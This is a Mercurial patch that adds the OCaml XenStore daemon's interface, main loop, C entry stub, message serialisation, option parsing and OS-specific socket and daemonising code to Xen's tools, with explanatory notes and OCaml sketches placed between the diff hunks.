- * notice, this list of conditions and the following disclaimer in the
- * documentation and/or other materials provided with the distribution.
- * 
- * * Neither the name of the original author; nor the names of any contributors
- * may be used to endorse or promote products derived from this software
- * without specific prior written permission.
- * 
- * 
- * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
- * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
- * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
- * A PARTICULAR PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE COPYRIGHT OWNER
- * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
- * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
- * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
- * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
- * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
- * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
- * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
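The two indexFor variants in the removed header differ only in how a hash value is reduced to a bucket index. A small sketch in OCaml (function names are hypothetical, non-negative inputs assumed) shows why the masking variant is only valid when the table length is a power of two:

```ocaml
(* General reduction: valid for any positive table length. *)
let index_for table_length hash_value = hash_value mod table_length

(* Masking reduction: only equivalent to mod when table_length = 2^N. *)
let index_for_pow2 table_length hash_value =
  hash_value land (table_length - 1)

(* Helper to check the precondition of index_for_pow2. *)
let is_power_of_two n = n > 0 && n land (n - 1) = 0
```

With a length of 16 the two functions agree; with a length of 12 they do not, which is why the header kept the modulo form.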
diff -r 10a8fae412c5 tools/xenstore/interface.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/interface.ml       Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,27 @@
+(* 
+    Interface for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+class virtual interface =
+object
+  method virtual can_read : bool
+  method virtual can_write : bool
+  method virtual destroy : unit
+  method virtual read : string -> int -> int -> int
+  method virtual write : string -> int -> int -> int
+end
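To make the contract of the virtual class concrete, here is a minimal in-memory implementation sketch. It is not part of the patch: loopback_interface is a hypothetical name, and the buffer arguments use bytes rather than string because current OCaml strings are immutable (the patch targets an older compiler where read could fill a string in place).

```ocaml
(* Same shape as the interface class above, with bytes buffers. *)
class virtual interface =
object
  method virtual can_read : bool
  method virtual can_write : bool
  method virtual destroy : unit
  method virtual read : bytes -> int -> int -> int
  method virtual write : bytes -> int -> int -> int
end

(* Hypothetical loopback: whatever is written can be read back later. *)
class loopback_interface =
object
  inherit interface
  val pending = Buffer.create 64
  val mutable consumed = 0
  method can_read = Buffer.length pending > consumed
  method can_write = true
  method destroy = (Buffer.clear pending; consumed <- 0)
  (* Copy at most len unread bytes into buf at off; return the count. *)
  method read buf off len =
    let n = min len (Buffer.length pending - consumed) in
    Buffer.blit pending consumed buf off n;
    consumed <- consumed + n;
    n
  (* Append len bytes of buf starting at off; return the count written. *)
  method write buf off len =
    Buffer.add_subbytes pending buf off len;
    len
end
```

As in the patch, read and write take a buffer, an offset and a length, and return the number of bytes transferred.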
diff -r 10a8fae412c5 tools/xenstore/main.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/main.ml    Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,85 @@
+(* 
+    Main functions for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+(* Handle event *)
+let handle_event xenstored =
+  let port = Eventchan.pending () in
+  if port <> Constants.null_file_descr
+  then (
+    if port = xenstored#virq_port
+    then (
+      let domains = xenstored#domains#cleanup in
+      if List.length domains > 0
+      then (
+        List.iter (fun domain -> if domain#is_dying then xenstored#remove_domain domain) domains;
+        xenstored#watches#fire_watches "@releaseDomain" false false
+      )
+    );
+    if Eventchan.unmask port = - 1 then Utils.barf_perror "Failed to write to event channel"
+  )
+  else Utils.barf_perror ("Failed to read from event channel")
+
+(* Handle I/O for domains *)
+let handle_io xenstored =
+  let handle_io_for_domain domain =
+    try
+      if domain#can_read then domain#read;
+      if domain#has_input_message
+      then (
+        Trace.io domain#id "IN" (Os.get_time ()) (List.hd domain#input_messages);
+        let msg_type = Message.message_type_to_string (List.hd domain#input_messages).Message.header.Message.message_type
+        and msg_length = (List.hd domain#input_messages).Message.header.Message.length in
+        if xenstored#options.Option.verbose then (Printf.printf "Got message %s len %d from %d\n" msg_type msg_length domain#id; flush stdout);
+        Process.process xenstored domain
+      );
+      while domain#can_write do
+        let msg_type = Message.message_type_to_string (List.hd domain#output_messages).Message.header.Message.message_type
+        and msg_payload = (List.hd domain#output_messages).Message.payload in
+        if xenstored#options.Option.verbose then (Printf.printf "Writing msg %s (%s) out to %d\n" msg_type msg_payload domain#id; flush stdout);
+        Trace.io domain#id "OUT" (Os.get_time ()) (List.hd domain#output_messages);
+        domain#write
+      done
+    with Constants.Xs_error (Constants.EIO, _, _) -> (
+          (try if not (Domain.is_unprivileged domain) then while domain#can_write do domain#write done with _ -> ());
+          xenstored#remove_domain domain;
+          if Domain.is_unprivileged domain then xenstored#watches#fire_watches "@releaseDomain" false false
+        )
+  in
+  List.iter handle_io_for_domain xenstored#domains#domains
+
+(* Main method *)
+let main () =
+  let options = Option.parse () in
+  Option.check_options options;
+  
+  let store = new Store.store in
+  let xenstored = new Xenstored.xenstored options store in
+  
+  Os.init ();
+  
+  let event_chan = xenstored#initialise_domains in
+  
+  while true do
+    Os.check_connections xenstored event_chan;
+    if Os.check_event_chan event_chan then handle_event xenstored;
+    handle_io xenstored
+  done
+
+(* Register callback for main function *)
+let _ = Callback.register "main" main
diff -r 10a8fae412c5 tools/xenstore/main_c.c
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/main_c.c   Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,49 @@
+/*
+    C main function for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*/
+
+#include <stdio.h>
+#include <errno.h>
+#include <unistd.h>
+#include <sys/mman.h>
+
+#include <xenctrl.h>
+
+#include <caml/mlvalues.h>
+#include <caml/callback.h>
+#include <caml/memory.h>
+#include <caml/alloc.h>
+
+int main(int argc, char *argv[], char *envp[])
+{
+    value *val;
+
+    /* Wait before things might hang up */
+    sleep(1);
+
+    caml_startup(argv);
+    val = caml_named_value("main");
+    if (!val) {
+        printf("Couldn't find Caml main\n");
+        return 1;
+    }
+
+    caml_callback(*val, Val_int(0));
+
+    return 0;
+}
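The C stub above looks up the value registered under the name "main" and applies it to unit. For caml_callback to make sense, the registered value has to be a function. A minimal sketch of the OCaml side, assuming a hypothetical run_daemon in place of the real daemon loop:

```ocaml
(* Hypothetical stand-in for the daemon loop; it only records that it ran. *)
let started = ref false

let run_daemon () =
  started := true

(* Register a closure that takes unit. The C side passes Val_int(0),
   which is the runtime representation of the unit value. *)
let () = Callback.register "main" run_daemon
```

Registering a function rather than an already-evaluated value keeps module initialisation (inside caml_startup) separate from the start of the main loop.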
diff -r 10a8fae412c5 tools/xenstore/message.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/message.ml Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,184 @@
+(* 
+    Messages for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+let header_size = 16;
+
+(* XenStore message types *)
+type xs_message_type =
+  | XS_DEBUG
+  | XS_DIRECTORY
+  | XS_READ
+  | XS_GET_PERMS
+  | XS_WATCH
+  | XS_UNWATCH
+  | XS_TRANSACTION_START
+  | XS_TRANSACTION_END
+  | XS_INTRODUCE
+  | XS_RELEASE
+  | XS_GET_DOMAIN_PATH
+  | XS_WRITE
+  | XS_MKDIR
+  | XS_RM
+  | XS_SET_PERMS
+  | XS_WATCH_EVENT
+  | XS_ERROR
+  | XS_IS_DOMAIN_INTRODUCED
+  | XS_RESUME
+  | XS_SET_TARGET
+  | XS_UNKNOWN
+
+(* Convert a message type to an int32 *)
+let xs_message_type_to_int32 message_type =
+  match message_type with
+  | XS_DEBUG -> 0l
+  | XS_DIRECTORY -> 1l
+  | XS_READ -> 2l
+  | XS_GET_PERMS -> 3l
+  | XS_WATCH -> 4l
+  | XS_UNWATCH -> 5l
+  | XS_TRANSACTION_START -> 6l
+  | XS_TRANSACTION_END -> 7l
+  | XS_INTRODUCE -> 8l
+  | XS_RELEASE -> 9l
+  | XS_GET_DOMAIN_PATH -> 10l
+  | XS_WRITE -> 11l
+  | XS_MKDIR -> 12l
+  | XS_RM -> 13l
+  | XS_SET_PERMS -> 14l
+  | XS_WATCH_EVENT -> 15l
+  | XS_ERROR -> 16l
+  | XS_IS_DOMAIN_INTRODUCED -> 17l
+  | XS_RESUME -> 18l
+  | XS_SET_TARGET -> 19l
+  | XS_UNKNOWN -> - 1l
+
+(* Convert an int32 to a message type *)
+let int32_to_message_type xs_message_type =
+  match xs_message_type with
+  | 0l -> XS_DEBUG
+  | 1l -> XS_DIRECTORY
+  | 2l -> XS_READ
+  | 3l -> XS_GET_PERMS
+  | 4l -> XS_WATCH
+  | 5l -> XS_UNWATCH
+  | 6l -> XS_TRANSACTION_START
+  | 7l -> XS_TRANSACTION_END
+  | 8l -> XS_INTRODUCE
+  | 9l -> XS_RELEASE
+  | 10l -> XS_GET_DOMAIN_PATH
+  | 11l -> XS_WRITE
+  | 12l -> XS_MKDIR
+  | 13l -> XS_RM
+  | 14l -> XS_SET_PERMS
+  | 15l -> XS_WATCH_EVENT
+  | 16l -> XS_ERROR
+  | 17l -> XS_IS_DOMAIN_INTRODUCED
+  | 18l -> XS_RESUME
+  | 19l -> XS_SET_TARGET
+  | _ -> XS_UNKNOWN
+
+(* Return string representation of a message type *)
+let message_type_to_string message_type =
+  match message_type with
+  | XS_DEBUG -> "DEBUG"
+  | XS_DIRECTORY -> "DIRECTORY"
+  | XS_READ -> "READ"
+  | XS_GET_PERMS -> "GET_PERMS"
+  | XS_WATCH -> "WATCH"
+  | XS_UNWATCH -> "UNWATCH"
+  | XS_TRANSACTION_START -> "TRANSACTION_START"
+  | XS_TRANSACTION_END -> "TRANSACTION_END"
+  | XS_INTRODUCE -> "INTRODUCE"
+  | XS_RELEASE -> "RELEASE"
+  | XS_GET_DOMAIN_PATH -> "GET_DOMAIN_PATH"
+  | XS_WRITE -> "WRITE"
+  | XS_MKDIR -> "MKDIR"
+  | XS_RM -> "RM"
+  | XS_SET_PERMS -> "SET_PERMS"
+  | XS_WATCH_EVENT -> "WATCH_EVENT"
+  | XS_ERROR -> "ERROR"
+  | XS_IS_DOMAIN_INTRODUCED -> "IS_DOMAIN_INTRODUCED"
+  | XS_RESUME -> "RESUME"
+  | XS_SET_TARGET -> "SET_TARGET"
+  | XS_UNKNOWN -> "UNKNOWN"
+
+(* Message header *)
+type header =
+  {
+    message_type : xs_message_type;
+    transaction_id : int32;
+    request_id : int32;
+    length : int
+  }
+
+(* Message *)
+type message =
+  {
+    header : header;
+    payload : string
+  }
+
+(* Make a message *)
+let make message_type transaction_id request_id payload =
+  {
+    header =
+      {
+        message_type = message_type;
+        transaction_id = transaction_id;
+        request_id = request_id;
+        length = (String.length payload)
+      };
+    payload = payload
+  }
+
+(* Null message *)
+let null_message = make XS_UNKNOWN 0l 0l Constants.null_string
+
+(* ACK message *)
+let ack message =
+  make message.header.message_type message.header.transaction_id message.header.request_id (Utils.null_terminate "OK")
+
+(* Error message *)
+let error message error =
+  make XS_ERROR message.header.transaction_id message.header.request_id (Utils.null_terminate (Constants.error_message error))
+
+(* Event message *)
+let event payload =
+  make XS_WATCH_EVENT 0l 0l payload
+
+(* Reply message *)
+let reply message payload =
+  make message.header.message_type message.header.transaction_id message.header.request_id payload
+
+(* Deserialise a message header from a string *)
+let deserialise_header buffer =
+  {
+    message_type = int32_to_message_type (Utils.bytes_to_int32 (String.sub buffer 0 4));
+    transaction_id = Utils.bytes_to_int32 (String.sub buffer 8 4);
+    request_id = Utils.bytes_to_int32 (String.sub buffer 4 4);
+    length = Utils.bytes_to_int (String.sub buffer 12 4)
+  }
+
+(* Serialise a message header to a string *)
+let serialise_header header =
+  let message_type = Utils.int32_to_bytes (xs_message_type_to_int32 header.message_type)
+  and transaction_id = Utils.int32_to_bytes header.transaction_id
+  and request_id = Utils.int32_to_bytes header.request_id
+  and length = Utils.int_to_bytes header.length in
+  message_type ^ request_id ^ transaction_id ^ length
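The header layout used by serialise_header and deserialise_header is four 32-bit fields in the order type, request id, transaction id, length, for a total of header_size = 16 bytes. The following round-trip sketch is self-contained and makes two assumptions that the patch does not show: the fields are little-endian (Utils.int32_to_bytes is defined elsewhere), and the message type is kept as a raw int32 for brevity. It needs OCaml 4.08 or later for the Bytes int32 accessors.

```ocaml
let header_size = 16

(* Simplified header: the message type stays a raw int32 here. *)
type header = {
  message_type : int32;
  request_id : int32;
  transaction_id : int32;
  length : int;
}

(* Pack the four fields at offsets 0, 4, 8 and 12 (little-endian assumed). *)
let serialise_header h =
  let b = Bytes.create header_size in
  Bytes.set_int32_le b 0 h.message_type;
  Bytes.set_int32_le b 4 h.request_id;
  Bytes.set_int32_le b 8 h.transaction_id;
  Bytes.set_int32_le b 12 (Int32.of_int h.length);
  Bytes.to_string b

(* Read the fields back from the same offsets. *)
let deserialise_header s =
  let b = Bytes.of_string s in
  {
    message_type = Bytes.get_int32_le b 0;
    request_id = Bytes.get_int32_le b 4;
    transaction_id = Bytes.get_int32_le b 8;
    length = Int32.to_int (Bytes.get_int32_le b 12);
  }
```

Note that the request id sits at offset 4 and the transaction id at offset 8, matching the offsets in deserialise_header even though the record declares transaction_id first.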
diff -r 10a8fae412c5 tools/xenstore/option.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/option.ml  Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,95 @@
+(* 
+    Options for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+(* Options type *)
+type t = {
+  fork : bool;
+  output_pid : bool;
+  domain_init : bool;
+  separate_domain : bool;
+  pid_file : string;
+  trace_file : string;
+  recovery : bool;
+  verbose : bool;
+  quota_num_entries_per_domain : int;
+  quota_max_entry_size : int;
+  quota_num_watches_per_domain : int;
+  quota_max_transaction : int
+}
+
+(* Usage message header *)
+let usage = "Usage:\n  xenstored <options>\n\nwhere options may include:\n"
+
+(* Parse command-line options *)
+let parse () =
+  (* Default options *)
+  let fork = ref true
+  and output_pid = ref false
+  and domain_init = ref true
+  and pid_file = ref ""
+  and trace_file = ref ""
+  and recovery = ref true
+  and verbose = ref false
+  and separate_domain = ref false
+  and quota_num_entries_per_domain = ref 1000
+  and quota_max_entry_size = ref 2048
+  and quota_num_watches_per_domain = ref 128
+  and quota_max_transaction = ref 10 in
+  
+  (* Command-line arguments list *)
+  let spec_list = Arg.align [
+      ("--no-domain-init", Arg.Clear domain_init, " to state that xenstored should not initialise dom0,");
+      ("--pid-file", Arg.Set_string pid_file, "<file> giving a file for the daemon's pid to be written,");
+      ("--no-fork", Arg.Clear fork, " to request that the daemon does not fork,");
+      ("--output-pid", Arg.Set output_pid, " to request that the pid of the daemon is output,");
+      ("--trace-file", Arg.String (fun s -> trace_file := s; Trace.traceout := Some (open_out s)), "<file> giving the file for logging,");
+      ("--entry-nb", Arg.Set_int quota_num_entries_per_domain, "<nb> limit the number of entries per domain,");
+      ("--entry-size", Arg.Set_int quota_max_entry_size, "<size> limit the size of entry per domain,");
+      ("--entry-watch", Arg.Set_int quota_num_watches_per_domain,"<nb> limit the number of watches per domain,");
+      ("--transaction", Arg.Set_int quota_max_transaction, "<nb> limit the number of transactions allowed per domain,");
+      ("--no-recovery", Arg.Clear recovery, " to request that no recovery should be attempted when the store is corrupted (debug only),");
+      ("--preserve-local", Arg.Unit (fun () -> ()), " to request that /local is preserved on start-up,");
+      ("--verbose", Arg.Set verbose, " to request verbose execution.");
+      ("--separate-dom", Arg.Set separate_domain, " xenstored runs in its own domain.");
+      ] in
+  
+  (* Parse command-line arguments *)
+  Arg.parse spec_list Os.parse_option usage;
+  
+  (* Set and return chosen options *)
+  {
+    fork = !fork;
+    output_pid = !output_pid;
+    domain_init = !domain_init;
+    separate_domain = !separate_domain;
+    pid_file = !pid_file;
+    trace_file = !trace_file;
+    recovery = !recovery;
+    verbose = !verbose;
+    quota_num_entries_per_domain = !quota_num_entries_per_domain;
+    quota_max_entry_size = !quota_max_entry_size;
+    quota_num_watches_per_domain = !quota_num_watches_per_domain;
+    quota_max_transaction = !quota_max_transaction
+  }
+
+let check_options options =
+  if not options.domain_init && options.separate_domain then Utils.barf_perror "Incompatible options";
+  if options.fork then Os.daemonise ();
+  if options.pid_file <> Constants.null_string then Os.write_pid_file options.pid_file;
+  if options.output_pid then (Printf.printf "%d\n" (Os.get_pid ()); flush stdout)
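The option parser above follows the usual Arg pattern: each flag updates a reference holding a default, and the references are read out once parsing finishes. A reduced sketch with three of the flags, using Arg.parse_argv on an explicit array so it can be tried without a real command line (parse_args and the shortened help strings are illustrative only):

```ocaml
(* Parse a subset of the daemon flags from an explicit argv array.
   Returns (verbose, fork, entry_nb) after applying the defaults. *)
let parse_args argv =
  let verbose = ref false
  and fork = ref true
  and entry_nb = ref 1000 in
  let spec_list = Arg.align [
      ("--verbose", Arg.Set verbose, " request verbose execution");
      ("--no-fork", Arg.Clear fork, " do not fork");
      ("--entry-nb", Arg.Set_int entry_nb, "<nb> entries per domain");
    ] in
  (* ~current is given explicitly so repeated calls start at index 0. *)
  Arg.parse_argv ~current:(ref 0) argv spec_list (fun _ -> ()) "usage";
  (!verbose, !fork, !entry_nb)
```

For example, parse_args [| "xenstored"; "--no-fork"; "--entry-nb"; "42" |] leaves verbose at its default and returns (false, false, 42).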
diff -r 10a8fae412c5 tools/xenstore/os.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/os.ml      Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,224 @@
+(* 
+    OS-specific code for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+let xenstored_proc_domid = "/proc/xen/xsd_domid"
+let xenstored_proc_dom0_port = "/proc/xen/xsd_dom0_port"
+let xenstored_proc_dom0_mfn = "/proc/xen/xsd_dom0_mfn"
+let xenstored_proc_kva = "/proc/xen/xsd_kva"
+let xenstored_proc_port = "/proc/xen/xsd_port"
+
+(* Change the permissions for a socket address *)
+let xsd_chmod addr =
+  match addr with
+  | Unix.ADDR_UNIX name -> Unix.chmod name 0o600
+  | _ -> Utils.barf_perror "addr -- chmod oops"
+
+(* Get a XenStore daemon directory *)
+let xsd_getdir env_var fallback =
+  try Sys.getenv env_var with Not_found -> fallback
+
+(* Create the given XenStore daemon directory, if needed *)
+let xsd_mkdir name =
+  if not (Sys.file_exists name) then Unix.mkdir name 0o755
+
+(* Return the XenStore daemon run directory *)
+let xsd_rundir () =
+  xsd_getdir "XENSTORED_RUNDIR" "/var/run/xenstored"
+
+(* Return the XenStore daemon path *)
+let xsd_socket_path () =
+  xsd_getdir "XENSTORED_PATH" ((xsd_rundir ()) ^ "/socket")
+
+(* Return the name of the XenStore daemon read-only socket *)
+let xsd_socket_ro () =
+  (xsd_socket_path ()) ^ "_ro"
+
+(* Return the name of the XenStore daemon read-write socket *)
+let xsd_socket_rw () =
+  xsd_socket_path ()
+
+(* Remove the old sockets *)
+let xsd_unlink addr =
+  match addr with
+  | Unix.ADDR_UNIX name -> if Sys.file_exists name then Unix.unlink name
+  | _ -> Utils.barf_perror "addr -- unlink oops"
+
+let conn_fds = Hashtbl.create 8
+let conn_id = ref (- 1)
+let in_set = ref []
+let out_set = ref []
+
+(* Accept a connection *)
+let accept socket can_write in_set out_set =
+  let (fd, _) = Unix.accept socket in
+  let interface = new Socket.socket_interface fd can_write in_set out_set in
+  let connection = new Connection.connection interface in
+  let domu = new Domain.domain !conn_id connection in
+  decr conn_id;
+  Hashtbl.add conn_fds domu#id fd;
+  domu
+
+(* Create and listen to a socket *)
+let create_socket socket_name =
+  xsd_mkdir (xsd_rundir ());
+  let addr = Unix.ADDR_UNIX socket_name
+  and socket = Unix.socket Unix.PF_UNIX Unix.SOCK_STREAM 0 in
+  xsd_unlink addr;
+  Unix.bind socket addr;
+  xsd_chmod addr;
+  Unix.listen socket 1;
+  socket
+
+let filter_conn_fds conn_fds domains =
+  let active_conn_ids = List.fold_left (fun ids domain -> if domain#id < 0 then domain#id :: ids else ids) [] domains in
+  Hashtbl.iter (fun id fd -> if not (List.mem id active_conn_ids) then Hashtbl.remove conn_fds id) conn_fds
+
+(* Fork daemon *)
+let fork_daemon () =
+  let pid = Unix.fork () in
+  if pid < 0 then Utils.barf_perror ("Failed to fork daemon: " ^ (string_of_int pid));
+  if pid <> 0 then exit 0
+
+(* Return the (input) socket connections *)
+let get_input_socket_connections conn_fds =
+  Hashtbl.fold (fun _ fd rest -> fd :: rest) conn_fds []
+
+(* Return the (output) socket connections *)
+let get_output_socket_connections domains conn_fds =
+  List.fold_left (fun rest domain -> if domain#can_write then Hashtbl.find conn_fds domain#id :: rest else rest) [] (List.filter (fun domain -> Hashtbl.mem conn_fds domain#id) domains)
+
+(* Read a value from a proc file *)
+let read_int_from_proc name =
+  let fd = Unix.openfile name [ Unix.O_RDONLY ] 0o600
+  and buff = String.create 20 in
+  let int = Unix.read fd buff 0 (String.length buff) in
+  Unix.close fd;
+  if int <> Constants.null_file_descr then int_of_string (String.sub buff 0 int) else Constants.null_file_descr
+
+let socket_rw = create_socket (xsd_socket_rw ())
+let socket_ro = create_socket (xsd_socket_ro ())
+let special_fds = ref [ socket_rw; socket_ro ]
+
+(* Check connections *)
+let check_connections xenstored event_chan =
+  filter_conn_fds conn_fds xenstored#domains#domains;
+  
+  let input_conns = get_input_socket_connections conn_fds
+  and output_conns = get_output_socket_connections xenstored#domains#domains conn_fds
+  and timeout = xenstored#domains#timeout in
+  
+  let (i_set, o_set, _) = Unix.select ((if event_chan <> Constants.null_file_descr then Socket.file_descr_of_int event_chan :: !special_fds else !special_fds) @ input_conns) output_conns [] timeout in
+  in_set := i_set;
+  out_set := o_set;
+  
+  if List.mem socket_rw !in_set then xenstored#add_domain (accept socket_rw true in_set out_set);
+  if List.mem socket_ro !in_set then xenstored#add_domain (accept socket_ro false in_set out_set)
+
+(* Check the event channel for an event *)
+let check_event_chan event_chan =
+  List.mem (Socket.file_descr_of_int event_chan) !in_set
+
+(* Daemonise *)
+let daemonise () =
+  (* Separate from parent via fork, so init inherits us *)
+  fork_daemon ();
+  
+  (* Session leader so ^C doesn't whack us *)
+  ignore (Unix.setsid ());
+  
+  (* Let session leader exit so child cannot regain CTTY *)
+  fork_daemon ();
+  
+  (* Move off any mount points we might be in *)
+  (try Unix.chdir "/" with _ -> Utils.barf_perror "Failed to chdir");
+  
+  (* Discard parent's old-fashioned umask prejudices *)
+  ignore (Unix.umask 0);
+  
+  (* Redirect outputs to null device *)
+  let dev_null = Unix.openfile "/dev/null" [ Unix.O_RDWR ] 0o600 in
+  Unix.dup2 dev_null Unix.stdin;
+  Unix.dup2 dev_null Unix.stdout;
+  Unix.dup2 dev_null Unix.stderr;
+  Unix.close dev_null
+
+(* Return the XenStore domain ID *)
+let get_domxs_id () =
+  read_int_from_proc xenstored_proc_domid
+
+(* Return the Domain-0 mfn *)
+let get_dom0_mfn () =
+  read_int_from_proc xenstored_proc_dom0_mfn
+
+(* Return the Domain-0 port *)
+let get_dom0_port () =
+  read_int_from_proc xenstored_proc_dom0_port
+
+(* Return the pid *)
+let get_pid () =
+  Unix.getpid ()
+
+(* Return the current time *)
+let get_time () =
+  let tm = Unix.localtime (Unix.gettimeofday ()) in
+  let year = tm.Unix.tm_year + 1900
+  and month = tm.Unix.tm_mon + 1
+  and day = tm.Unix.tm_mday
+  and hour = tm.Unix.tm_hour
+  and minute = tm.Unix.tm_min
+  and second = tm.Unix.tm_sec in
+  Printf.sprintf "%04d%02d%02d %02d:%02d:%02d" year month day hour minute second;;
+
+(* Return the XenBus port *)
+let get_xenbus_port () =
+  let fd = Unix.openfile xenstored_proc_port [ Unix.O_RDONLY ] 0
+  and str = String.create 20 in
+  let len = Unix.read fd str 0 (String.length str) in
+  Unix.close fd;
+  if len <> - 1 then int_of_string (String.sub str 0 len) else Constants.null_file_descr
+
+(* OS specific initialisation *)
+let init () =
+  ignore (Sys.signal Sys.sigpipe Sys.Signal_ignore)
+
+(* Map XenBus page *)
+let map_xenbus port =
+  let fd = Unix.openfile xenstored_proc_kva [ Unix.O_RDWR ] 0o600 in
+  let interface = new Xenbus.xenbus_interface port (Xenbus.mmap (Socket.int_of_file_descr fd)) in
+  Unix.close fd;
+  interface
+
+(* Extra option parsing, if needed *)
+let parse_option option =
+  ()
+
+(* Write PID file *)
+let write_pid_file pid_file =
+  let fd = Unix.openfile pid_file [ Unix.O_RDWR; Unix.O_CREAT ] 0o600 in
+  
+  (* Exit silently if daemon already running *)
+  (try Unix.lockf fd Unix.F_TLOCK 0 with _ -> ignore (exit 0));
+  
+  let pid = string_of_int (Unix.getpid ()) in
+  let len = String.length pid in
+  
+  try
+    if Unix.write fd pid 0 len <> len then Utils.barf_perror ("Writing pid file " ^ pid_file);
+    Unix.close fd
+  with _ -> Utils.barf_perror ("Writing pid file " ^ pid_file)
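One point worth a second look in os.ml: filter_conn_fds removes entries from conn_fds while Hashtbl.iter is still traversing it, and the standard library documentation leaves the behaviour unspecified when the table is modified during iteration. A possible alternative, assuming OCaml 4.03 or later (newer than the compiler this patch was written for), is Hashtbl.filter_map_inplace. The sketch below takes the list of active ids directly instead of the domain objects:

```ocaml
(* Keep only the connections whose id is still active.
   active_ids stands in for the ids collected from the domain list. *)
let filter_conn_fds conn_fds active_ids =
  Hashtbl.filter_map_inplace
    (fun id fd -> if List.mem id active_ids then Some fd else None)
    conn_fds
```

On older compilers the same effect can be had by first collecting the stale ids into a list and removing them after the iteration has finished.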
diff -r 10a8fae412c5 tools/xenstore/permission.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
